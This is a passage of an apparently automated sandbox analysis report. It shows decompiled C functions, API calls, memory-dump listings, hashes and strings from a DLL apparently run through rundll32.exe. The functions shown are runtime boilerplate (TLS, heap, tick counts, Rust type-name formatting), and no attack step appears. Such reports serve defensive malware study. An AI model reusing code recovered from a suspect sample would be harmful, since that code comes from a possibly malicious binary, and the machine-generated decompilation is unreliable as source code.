                          0x6f251ca9
                          0x6f251c46
                          0x6f251c4f
                          0x6f251c88
                          0x6f251c95
                          0x6f251c97
                          0x6f251c97
                          0x00000000
                          0x6f251c97
                          0x6f251c59
                          0x6f251c5e
                          0x6f251c63
                          0x00000000
                          0x00000000
                          0x6f251c6d
                          0x6f251c72
                          0x6f251c77
                          0x00000000
                          0x00000000
                          0x6f251c7c
                          0x6f251c82
                          0x6f251c86
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f251c86
                          0x6f251c23
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f251c29
                          0x6f251ca3
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6F251D09,FFFDD001,00000400,?,00000000,?,?,6F251E82,00000021,FlsSetValue,6F2839F8,6F283A00,?), ref: 6F251CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: e23872efe40e06d3156e8d5c83f472f21d6971b95bb11d03d6e13269eb8a0780
                          • Instruction ID: 8fa77b716f7202f175d9d8d668aaf3b8122d4e23c60ff9e38ef861af14b50cfb
                          • Opcode Fuzzy Hash: e23872efe40e06d3156e8d5c83f472f21d6971b95bb11d03d6e13269eb8a0780
                          • Instruction Fuzzy Hash: 7A21F6B290661EA7DB118F24CC44F8A3768EF42376F200111E921AB7C0D771F965CE91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24CCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E6F24CCFF(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6f28a4c0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6F24DEBB(_t13, __eflags,  *0x6f28a4c0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F24DEF6(_t14, __eflags,  *0x6f28a4c0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6F24F601();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F24DEF6(_t18, __eflags,  *0x6f28a4c0, 0);
								} else {
									_t8 = E6F24DEF6(_t18, __eflags,  *0x6f28a4c0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F24F548(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                          0x6f24ccff
                          0x6f24cd06
                          0x6f24cd19
                          0x6f24cd20
                          0x6f24cd22
                          0x6f24cd23
                          0x6f24cd26
                          0x6f24cd3f
                          0x6f24cd3f
                          0x6f24cd28
                          0x6f24cd28
                          0x6f24cd2a
                          0x6f24cd34
                          0x6f24cd3b
                          0x6f24cd3d
                          0x6f24cd44
                          0x6f24cd4d
                          0x6f24cd50
                          0x6f24cd51
                          0x6f24cd53
                          0x6f24cd67
                          0x6f24cd67
                          0x6f24cd70
                          0x6f24cd55
                          0x6f24cd5c
                          0x6f24cd62
                          0x6f24cd63
                          0x6f24cd65
                          0x6f24cd79
                          0x6f24cd7b
                          0x6f24cd7b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24cd65
                          0x6f24cd7e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24cd3d
                          0x6f24cd2a
                          0x6f24cd86
                          0x6f24cd90
                          0x6f24cd08
                          0x6f24cd0a
                          0x6f24cd0a

                          APIs
                          • GetLastError.KERNEL32(00000001,?,6F24CA41,6F24A8E2,6F24A0EC,?,6F24A324,?,00000001,?,?,00000001,?,6F287DA8,0000000C,6F24A41D), ref: 6F24CD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F24CD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F24CD34
                          • SetLastError.KERNEL32(00000000,6F24A324,?,00000001,?,?,00000001,?,6F287DA8,0000000C,6F24A41D,?,00000001,?), ref: 6F24CD86
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 5c54cdd068315b836c8008a26704f5756437dfc3f5ef4af04fbd59572530bbf5
                          • Instruction ID: 3c93ac09a83c104578186f8383c61afcb9094255e6437f5e9775cdb6d6d6aee5
                          • Opcode Fuzzy Hash: 5c54cdd068315b836c8008a26704f5756437dfc3f5ef4af04fbd59572530bbf5
                          • Instruction Fuzzy Hash: B501B93235DB1AEFAB1C16BCDC4C5572A54EB43B79720032DE538459D0EFE154188D60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2497A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6F249E50: GetTickCount64.KERNEL32 ref: 6F249E57
                          • GetTickCount64.KERNEL32 ref: 6F2497D6
                          • GetTickCount64.KERNEL32 ref: 6F2497F4
                          • GetTickCount64.KERNEL32 ref: 6F24980D
                          • GetTickCount64.KERNEL32 ref: 6F24980F
                          • GetTickCount64.KERNEL32 ref: 6F249816
                          • GetTickCount64.KERNEL32 ref: 6F249834
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: 847a969123472ca35c0cb048ecf3e8b4bd7c6bc6908f8318d0f54e60cf71e400
                          • Instruction ID: 2cef9a5b0d0a2ab1a895ba2807b63d422039b816f0db04f8cb352424716b5538
                          • Opcode Fuzzy Hash: 847a969123472ca35c0cb048ecf3e8b4bd7c6bc6908f8318d0f54e60cf71e400
                          • Instruction Fuzzy Hash: 76018062C24A1C8ED207AA39D846205B6AD6F973E4B11C313D04A77546FB9014F7CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F236D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E6F236D10(short* __ecx, signed int __edx) {
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				short _t38;
				void* _t39;
				signed int _t45;
				short _t50;
				void* _t51;
				short _t52;
				signed int _t53;
				signed int _t62;
				unsigned int _t66;
				char* _t78;
				signed int _t85;
				signed short _t88;
				intOrPtr _t90;
				char* _t91;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x30;
				_t90 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t90 == 0) {
					L6:
					_t52 = 0;
					L7:
					return _t52;
				}
				_push(1);
				_t30 = E6F231DE0(_t90,  &M6F27CBA9);
				_t96 = _t96 + 4;
				_t52 = 1;
				if(_t30 != 0) {
					goto L7;
				}
				if((__edx |  *(_t96 + 0x44)) == 0) {
					_push(1);
					return E6F231DE0(_t90, "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool");
				}
				 *_t96 = _t90;
				_t91 = 0;
				_t62 =  *((intOrPtr*)(__ecx + 0x18)) - __edx;
				asm("sbb esi, eax");
				if(_t62 >= 0) {
					__eflags = _t62 - 0x1a;
					asm("sbb eax, 0x0");
					if(_t62 >= 0x1a) {
						_t85 = _t62;
						_t78 = "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool";
						_push(1);
						_t34 = E6F231DE0( *_t96, _t78);
						_t96 = _t96 + 4;
						__eflags = _t34;
						if(_t34 != 0) {
							goto L7;
						}
						__eflags = _t85 - 0x2710;
						_t53 = _t85;
						asm("sbb eax, 0x0");
						if(_t85 < 0x2710) {
							_t36 = 0x27;
							L18:
							__eflags = _t53 - 0x63;
							if(_t53 > 0x63) {
								_t66 = _t53 & 0x0000ffff;
								_t53 = (_t66 >> 2) * 0x147b >> 0x11;
								 *((short*)(_t96 + _t36 + 6)) =  *((_t66 - _t53 * 0x00000064 & 0x0000ffff) + (_t66 - _t53 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
								_t36 = _t36 + 0xfffffffe;
								__eflags = _t36;
							}
							__eflags = _t53 - 0xa;
							if(_t53 >= 0xa) {
								_t24 = _t53 + 0x6f27b61c; // 0x31303030
								 *((short*)(_t96 + _t36 + 6)) =  *(_t53 + _t24) & 0x0000ffff;
								_t37 = _t36 + 0xfffffffe;
								__eflags = _t37;
							} else {
								 *((char*)(_t96 + _t36 + 7)) = _t53 + 0x30;
								_t37 = _t36 - 1;
							}
							_push(0x27 - _t37);
							_push(_t96 + _t37 + 8);
							_push(0);
							_t38 = E6F231AA0( *_t96, 0x6f27cd60);
							_t96 = _t96 + 0xc;
							_t52 = _t38;
							goto L7;
						}
						_t39 = 0x27;
						do {
							_t94 = _t39;
							_t88 = E6F249F10(_t53, _t91, 0x2710, 0);
							 *(_t96 + 4) = E6F249F90(_t53, _t91, 0x2710, 0);
							_t45 = ((_t88 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
							_t8 = _t45 + 0x6f27b61c; // 0x31303030
							__eflags = 0x5f5e0ff - _t53;
							_t53 =  *(_t96 + 4);
							asm("sbb ecx, esi");
							_t91 = _t78;
							 *((short*)(_t96 + _t94 + 4)) =  *(_t45 + _t8) & 0x0000ffff;
							 *((short*)(_t96 + _t94 + 6)) =  *((_t88 - _t45 * 0x00000064 & 0x0000ffff) + (_t88 - _t45 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
							_t16 = _t94 - 4; // 0x23
							_t39 = _t16;
						} while (__eflags < 0);
						goto L18;
					}
					 *((intOrPtr*)(_t96 + 8)) = _t62 + 0x61;
					_t50 = E6F233660(_t96 + 8, _t96 + 8,  *_t96);
					_t96 = _t96 + 8;
					_t52 = _t50;
					goto L7;
				}
				_push(0x10);
				_t51 = E6F231DE0( *_t96,  &M6F27CB85);
				_t96 = _t96 + 4;
				if(_t51 != 0) {
					goto L7;
				}
				 *__ecx = 1;
				goto L6;
			}
























                          0x6f236d14
                          0x6f236d17
                          0x6f236d1c
                          0x6f236d6c
                          0x6f236d6c
                          0x6f236d6e
                          0x00000000
                          0x6f236d70
                          0x6f236d29
                          0x6f236d2b
                          0x6f236d30
                          0x6f236d33
                          0x6f236d37
                          0x00000000
                          0x00000000
                          0x6f236d41
                          0x6f236d7f
                          0x00000000
                          0x6f236d86
                          0x6f236d46
                          0x6f236d49
                          0x6f236d4b
                          0x6f236d4d
                          0x6f236d4f
                          0x6f236d8b
                          0x6f236d90
                          0x6f236d93
                          0x6f236db0
                          0x6f236db5
                          0x6f236dba
                          0x6f236dbc
                          0x6f236dc1
                          0x6f236dc4
                          0x6f236dc6
                          0x00000000
                          0x00000000
                          0x6f236dc8
                          0x6f236dd0
                          0x6f236dd2
                          0x6f236dd5
                          0x6f236e50
                          0x6f236e55
                          0x6f236e55
                          0x6f236e58
                          0x6f236e5a
                          0x6f236e68
                          0x6f236e7b
                          0x6f236e80
                          0x6f236e80
                          0x6f236e80
                          0x6f236e83
                          0x6f236e86
                          0x6f236e92
                          0x6f236e9a
                          0x6f236e9f
                          0x6f236e9f
                          0x6f236e88
                          0x6f236e8b
                          0x6f236e8f
                          0x6f236e8f
                          0x6f236eb5
                          0x6f236eb6
                          0x6f236eb7
                          0x6f236eb9
                          0x6f236ebe
                          0x6f236ec1
                          0x00000000
                          0x6f236ec1
                          0x6f236dd7
                          0x6f236de0
                          0x6f236de0
                          0x6f236df0
                          0x6f236e00
                          0x6f236e10
                          0x6f236e16
                          0x6f236e25
                          0x6f236e27
                          0x6f236e30
                          0x6f236e32
                          0x6f236e34
                          0x6f236e44
                          0x6f236e49
                          0x6f236e49
                          0x6f236e49
                          0x00000000
                          0x6f236e4e
                          0x6f236d9c
                          0x6f236da4
                          0x6f236da9
                          0x6f236dac
                          0x00000000
                          0x6f236dac
                          0x6f236d59
                          0x6f236d5b
                          0x6f236d60
                          0x6f236d65
                          0x00000000
                          0x00000000
                          0x6f236d67
                          0x00000000

                          APIs
                          Strings
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6F236D7A, 6F236DB5
                          • {invalid syntax}, xrefs: 6F236D54
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F236D24
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 0ef14a3c1b065570730a4c84737a49f36c8999099e67ede961a407795423b7d0
                          • Instruction ID: 04d7387423e091d54124f16eae0685875a181581ff51a3507b60556500af3da4
                          • Opcode Fuzzy Hash: 0ef14a3c1b065570730a4c84737a49f36c8999099e67ede961a407795423b7d0
                          • Instruction Fuzzy Hash: 1D415BF2F0832C5BD3149A68D881F2ABBD99F85B44F00453EE9898F3D5D665C8418BA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23D1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E6F23D1B0(void* __ebx, void* __edi) {
				void _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				void* _v33;
				void* _v35;
				void* _v36;
				signed int _v39;
				void* _v44;
				long _v48;
				char _v76;
				void* __esi;
				long _t30;
				void* _t32;
				long _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				signed char _t43;
				signed char _t44;
				signed int _t46;
				void** _t49;
				void* _t51;
				long _t53;
				void* _t55;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t65;
				void* _t67;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t89;
				void* _t90;
				void* _t91;

				_t77 = __edi;
				_t55 = __ebx;
				_push(_t79);
				_t30 =  *0x6f28a04c; // 0x0
				if(_t30 == 0) {
					_t32 = TlsGetValue(E6F242B10(__ebx, 0x6f28a04c, __edi, _t79));
					__eflags = _t32 - 1;
					if(_t32 <= 1) {
						goto L5;
					} else {
						goto L4;
					}
				} else {
					_t32 = TlsGetValue(_t30);
					if(_t32 > 1) {
						L4:
						__eflags =  *_t32 - 1;
						_t82 = _t32;
						if( *_t32 == 1) {
							goto L18;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t33 =  *0x6f28a04c; // 0x0
						if(_t33 == 0) {
							_t35 = TlsGetValue(E6F242B10(_t55, 0x6f28a04c, _t77, _t79));
							__eflags = _t35;
							if(_t35 != 0) {
								goto L7;
							} else {
								goto L10;
							}
						} else {
							_t35 = TlsGetValue(_t33);
							if(_t35 == 0) {
								L10:
								_t37 =  *0x6f28adc8;
								__eflags = _t37;
								if(_t37 != 0) {
									L13:
									_t38 = HeapAlloc(_t37, 0, 0xc);
									__eflags = _t38;
									if(__eflags == 0) {
										goto L20;
									} else {
										 *_t38 = 0;
										 *(_t38 + 8) = 0x6f28a04c;
										_t82 = _t38;
										_t53 =  *0x6f28a04c; // 0x0
										__eflags = _t53;
										if(_t53 == 0) {
											_t53 = E6F242B10(_t55, 0x6f28a04c, _t77, _t82);
										}
										TlsSetValue(_t53, _t82);
										goto L17;
									}
								} else {
									_t37 = GetProcessHeap();
									__eflags = _t37;
									if(__eflags == 0) {
										L20:
										E6F256C30(_t55, 0xc, 4, _t77, _t79, __eflags);
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t55);
										_push(_t77);
										_push(_t79);
										_t90 = _t89 - 0x38;
										_v36 = _t90;
										_v24 = 0xffffffff;
										_v28 = E6F243B60;
										_v32 =  *[fs:0x0];
										 *[fs:0x0] =  &_v32;
										_v48 = 0xc;
										_v44 = 4;
										_v24 = 0;
										asm("movsd xmm0, [edx+0x10]");
										asm("movsd xmm2, [edx]");
										asm("movsd xmm1, [edx+0x8]");
										asm("movsd [ebp-0x34], xmm0");
										asm("movsd [ebp-0x3c], xmm1");
										asm("movsd [ebp-0x44], xmm2");
										_push( &_v76);
										E6F232320( &_v48, 0x6f27d390);
										_t91 = _t90 + 4;
										_t43 = _v44;
										__eflags = _t43;
										if(_t43 == 0) {
											_t44 = 4;
											__eflags = 4 - 3;
											if(4 != 3) {
												_t61 = 0x6f27d388;
											} else {
												_t65 = _v36;
												_v48 = _t65;
												_v20 = 1;
												 *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))))( *_t65);
												_t91 = _t91 + 4;
												_t49 = _v48;
												_t67 = _t49[1];
												__eflags =  *(_t67 + 4);
												if( *(_t67 + 4) != 0) {
													_t51 =  *_t49;
													__eflags =  *((intOrPtr*)(_t67 + 8)) - 9;
													if( *((intOrPtr*)(_t67 + 8)) >= 9) {
														_t51 =  *(_t51 - 4);
													}
													HeapFree( *0x6f28adc8, 0, _t51);
												}
												HeapFree( *0x6f28adc8, 0, _v36);
												_t61 = 0x6f27d388;
												_t44 = 4;
											}
											goto L32;
										} else {
											__eflags = _t43 - 4;
											if(_t43 != 4) {
												_t44 = _t43;
												_t63 = _v39;
											} else {
												_t61 = 0x6f27d388;
												_t44 = 2;
												L32:
												_t63 = _t61 << 0x00000018 | 0x00000028;
												__eflags = _t63;
											}
										}
										_t46 = _t44 & 0x000000ff | _t63 << 0x00000008;
										__eflags = _t46;
										 *[fs:0x0] = _v28;
										return _t46;
									} else {
										 *0x6f28adc8 = _t37;
										goto L13;
									}
								}
							} else {
								L7:
								_t80 = 0;
								if(_t35 != 1) {
									_t82 = _t35;
									L17:
									 *_t82 = 1;
									 *(_t82 + 4) = 0;
									L18:
									_t80 = _t82 + 4;
								}
								return _t80;
							}
						}
					}
				}
			}







































                          0x6f23d1b0
                          0x6f23d1b0
                          0x6f23d1b0
                          0x6f23d1b1
                          0x6f23d1b8
                          0x6f23d1d3
                          0x6f23d1d9
                          0x6f23d1dc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d1ba
                          0x6f23d1bb
                          0x6f23d1c4
                          0x6f23d1de
                          0x6f23d1de
                          0x6f23d1e1
                          0x6f23d1e3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d1c6
                          0x6f23d1e9
                          0x6f23d1e9
                          0x6f23d1f0
                          0x6f23d213
                          0x6f23d219
                          0x6f23d21b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d1f2
                          0x6f23d1f3
                          0x6f23d1fb
                          0x6f23d21d
                          0x6f23d21d
                          0x6f23d222
                          0x6f23d224
                          0x6f23d234
                          0x6f23d239
                          0x6f23d23e
                          0x6f23d240
                          0x00000000
                          0x6f23d242
                          0x6f23d242
                          0x6f23d248
                          0x6f23d24f
                          0x6f23d251
                          0x6f23d256
                          0x6f23d258
                          0x6f23d25f
                          0x6f23d25f
                          0x6f23d266
                          0x00000000
                          0x6f23d266
                          0x6f23d226
                          0x6f23d226
                          0x6f23d22b
                          0x6f23d22d
                          0x6f23d280
                          0x6f23d28a
                          0x6f23d28f
                          0x6f23d291
                          0x6f23d292
                          0x6f23d293
                          0x6f23d294
                          0x6f23d295
                          0x6f23d296
                          0x6f23d297
                          0x6f23d298
                          0x6f23d299
                          0x6f23d29a
                          0x6f23d29b
                          0x6f23d29c
                          0x6f23d29d
                          0x6f23d29e
                          0x6f23d29f
                          0x6f23d2a3
                          0x6f23d2a4
                          0x6f23d2a5
                          0x6f23d2a6
                          0x6f23d2a9
                          0x6f23d2ac
                          0x6f23d2b3
                          0x6f23d2c4
                          0x6f23d2c7
                          0x6f23d2d0
                          0x6f23d2d3
                          0x6f23d2d7
                          0x6f23d2e1
                          0x6f23d2e6
                          0x6f23d2ea
                          0x6f23d2f4
                          0x6f23d2f9
                          0x6f23d2fe
                          0x6f23d303
                          0x6f23d304
                          0x6f23d309
                          0x6f23d30c
                          0x6f23d30f
                          0x6f23d311
                          0x6f23d329
                          0x6f23d32b
                          0x6f23d32e
                          0x6f23d39f
                          0x6f23d330
                          0x6f23d330
                          0x6f23d335
                          0x6f23d33b
                          0x6f23d343
                          0x6f23d345
                          0x6f23d348
                          0x6f23d34b
                          0x6f23d34e
                          0x6f23d352
                          0x6f23d354
                          0x6f23d356
                          0x6f23d35a
                          0x6f23d35c
                          0x6f23d35c
                          0x6f23d368
                          0x6f23d368
                          0x6f23d378
                          0x6f23d37d
                          0x6f23d387
                          0x6f23d387
                          0x00000000
                          0x6f23d313
                          0x6f23d313
                          0x6f23d316
                          0x6f23d393
                          0x6f23d39a
                          0x6f23d318
                          0x6f23d318
                          0x6f23d322
                          0x6f23d3a9
                          0x6f23d3af
                          0x6f23d3af
                          0x6f23d3af
                          0x6f23d316
                          0x6f23d3bf
                          0x6f23d3bf
                          0x6f23d3c1
                          0x6f23d3cf
                          0x6f23d22f
                          0x6f23d22f
                          0x00000000
                          0x6f23d22f
                          0x6f23d22d
                          0x6f23d1fd
                          0x6f23d1fd
                          0x6f23d1fd
                          0x6f23d202
                          0x6f23d204
                          0x6f23d26c
                          0x6f23d26c
                          0x6f23d272
                          0x6f23d279
                          0x6f23d279
                          0x6f23d279
                          0x6f23d27f
                          0x6f23d27f
                          0x6f23d1fb
                          0x6f23d1f0
                          0x6f23d1c4

                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6F23C906), ref: 6F23D1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23D1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23D213
                          • GetProcessHeap.KERNEL32 ref: 6F23D226
                          • HeapAlloc.KERNEL32(03230000,00000000,0000000C), ref: 6F23D239
                          • TlsSetValue.KERNEL32(00000000,00000000,03230000,00000000,0000000C), ref: 6F23D266
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: 6c56319f3905df21190acc501cbb3c69ceba6604702f905e2189bbaa038d9369
                          • Instruction ID: 02058fda0ef783051bd4d6f74177ffbda9f443adf36b1f466d47ddbd2198bf9e
                          • Opcode Fuzzy Hash: 6c56319f3905df21190acc501cbb3c69ceba6604702f905e2189bbaa038d9369
                          • Instruction Fuzzy Hash: 7711E4F2B0172FDBEB144FB18858B66379AAB027A6F404415E910CBBC1DB74E824CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F250EB1(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6F2519B3(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6F250D08(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6F24F8B5(GetLastError());
									_t18 =  *((intOrPtr*)(E6F24F90F()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6F250F73(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F24F8B5(GetLastError());
						_t18 =  *((intOrPtr*)(E6F24F90F()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6F250F73(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F250F9A(_a8);
				return 0;
			}









                          0x6f250eb7
                          0x6f250ebc
                          0x6f250ed3
                          0x6f250f05
                          0x6f250f0f
                          0x6f250f28
                          0x6f250f2e
                          0x6f250f3c
                          0x6f250f49
                          0x6f250f50
                          0x6f250f69
                          0x6f250f6c
                          0x6f250f52
                          0x6f250f59
                          0x6f250f64
                          0x6f250f64
                          0x6f250f6e
                          0x6f250f6f
                          0x00000000
                          0x6f250f6f
                          0x6f250f33
                          0x6f250f3a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f250f3a
                          0x6f250f18
                          0x6f250f23
                          0x00000000
                          0x6f250f23
                          0x6f250ed5
                          0x6f250edb
                          0x6f250eee
                          0x6f250ef1
                          0x6f250ef3
                          0x6f250ef5
                          0x00000000
                          0x6f250ef5
                          0x6f250ee1
                          0x6f250ee8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f250ee8
                          0x6f250ec1
                          0x00000000

                          Strings
                          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F250ECD
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                          • API String ID: 0-2837366778
                          • Opcode ID: b0dc1307df7bf0635cbf7c7c0343b1b5e6edb946d0eb0a62053e74b8a5b5059c
                          • Instruction ID: 248014dbf8ff37153be0af854e9d4159b2242310c5bf22a16a21f0830868c85c
                          • Opcode Fuzzy Hash: b0dc1307df7bf0635cbf7c7c0343b1b5e6edb946d0eb0a62053e74b8a5b5059c
                          • Instruction Fuzzy Hash: 0D21493161C20FBF9710DFB5CC4095B77A9EF413AD7109625E8149BA80DB70F8608FA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24DD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
